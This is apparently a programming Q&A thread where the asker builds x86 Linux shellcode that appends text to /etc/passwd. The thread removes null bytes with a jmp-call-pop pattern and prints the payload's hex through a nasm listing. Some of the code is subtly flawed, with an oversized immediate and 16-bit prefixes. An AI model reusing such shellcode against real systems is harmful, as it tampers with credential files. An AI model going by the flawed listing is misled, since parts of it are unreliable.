# how to display hex value given asm file

Tags: assembly

could be a stupid question but i'm quite new. Using 32bit operating system and writing an assembly code to append string 'Hi' to /etc/passwd file works fine, now i want to retrieve the corresponding hex code, trying to discover bad char for shellcode building.
Built the executable by means of:

```
   nasm file.asm 
   ld file.o
```

then executing, i get string 'Hi' at the end of /etc/passwd. This is the assembly code i want to convert to see hex value:

```
section .text
global _start

_start:

    jmp two
one:
;open() write|append sys call
    pop ebx
    xor eax, eax
    mov cl, 1090
    mov al, 5
    int 0x80
    mov ebx, eax

    jmp four

five:
;write() sys call
    pop ecx
    xor eax, eax
    mov dl, 2
    mov al, 4
    int 0x80

;close() sys call
    mov al, 6
    int 0x80
;exit() sys call
    mov al, 1
    xor ebx, ebx
    int 0x80

two:
    call one
    db "/etc/passwd", 0
four:
    call five
    db "Hi", 0
```

UPDATE: same result with code below

```
section .text
global _start

_start:

    jmp two
one:
;open() write|append sys call
    pop ebx
    xor eax, eax
    mov [ebx+11], al        ; <--added now
    mov cl, 1090
    mov al, 5
    int 0x80
    mov ebx, eax

    jmp four

five:
;write() sys call
    pop ecx
    xor eax, eax
    mov [ecx+2], al      ; <--added now
    mov dl, 2
    mov al, 4
    int 0x80

;close() sys call
    mov al, 6
    int 0x80
;exit() sys call
    mov al, 1
    xor ebx, ebx
    int 0x80

two:
    call one
    db "/etc/passwdX"     ; <--modified now
four:
    call five
    db "HiX"              ; <--modified now
```

the new provided asm version still works and should solve the problem of NULL byte for the string, is it correct?

Comment: You can use `-l` option for `nasm` to get listing file, which is probably more useful during development, when you can see the hex + source together. For final "release binary" you may instead need something like .... not sure if I remember it correctly (so no answer, just comment, letting others expand on it)... objdump maybe, extracting from executable just the code section... Oh, wait, you are writing PIC anyway, so technically `nasm -bin` will emit raw machine code for you I guess (make sure you have correct target (`BITS 32`?) at beginning then as bin doesn't tell nasm much). Then hexview

Comment: iirc, in shellcode "db <something>,0" will not work ( null byte )

Comment: I'll update, given another form

Comment: e.g. you can push the values to the stack 4 byte-wise, and use xor to get the 0 to be pushed

Comment: modifying code in "section .text" (your filenames are there) will crash. try to use the stack

Comment: If I understand it correctly, your original question how to get binary/hexa of machine code was answered. You can maybe write your own answer describing, what process exactly you use to check the machine code, and get the hexa-formatted payload, and do not extend the original question by "how to fix zero", that's separate question (probably already having answer here, would be weird if this was not covered already several times).

Comment: thanks both, was very helpful

Answer (score 0):

Yes, the question was answered  in the first comment, the other comments helped me to improve the code. I would show all the steps from beginning for a better understanding:
This is the assembly code to append string 'Hi' to /etc/passwd:

```
global _start

_start:

    jmp two
one:
    ;open() write|append sys call
    pop ebx
    xor eax, eax
    mov [ebx+11], al        
    mov cl, 1090
    mov al, 5
    int 0x80
    mov ebx, eax

    jmp four

five:
    ;write() sys call
    pop ecx
    xor eax, eax
    mov [ecx+2], al      
    mov dl, 2
    mov al, 4
    int 0x80

    ;close() sys call
    mov al, 6
    int 0x80
    ;exit() sys call
    mov al, 1
    xor ebx, ebx
    int 0x80

two:
    call one
    db "/etc/passwdX"     
four:
    call five
    db "HiX"
```

then for the hex code generation, just execute as suggested:

```
 nasm -l output.txt file.asm
```

then open the output.txt and this will show:

```
 1                                  global _start
 2
 3                                  _start:
 4
 5 00000000 EB32                            jmp two
 6                                  one:
 7 00000002 665B                            pop ebx
 8 00000004 6631C0                          xor eax, eax
 9 00000007 6788430B                        mov [ebx+11], al
10 0000000B 66B942040000                    mov ecx, 1090
11 00000011 B005                            mov al, 5
12 00000013 CD80                            int 0x80
13 00000015 6689C3                          mov ebx, eax
14
15 00000018 EB29                            jmp four
16
17                                  five:
18 0000001A 6659                            pop ecx
19 0000001C 6631C0                          xor eax, eax
20 0000001F 67884102                        mov [ecx+2], al
21 00000023 B202                            mov dl, 2
22 00000025 B004                            mov al, 4
23 00000027 CD80                            int 0x80
24
25 00000029 B006                            mov al, 6
26 0000002B CD80                            int 0x80
27
28 0000002D B001                            mov al, 1
29 0000002F 6631DB                          xor ebx, ebx
30 00000032 CD80                            int 0x80
31
32                                  two:
33 00000034 E8CBFF                          call one
34 00000037 2F6574632F70617373-             db "/etc/passwdX"
35 00000040 776458
36                                  four:
37 00000043 E8D4FF                          call five
38 00000046 486958                          db "HiX"
```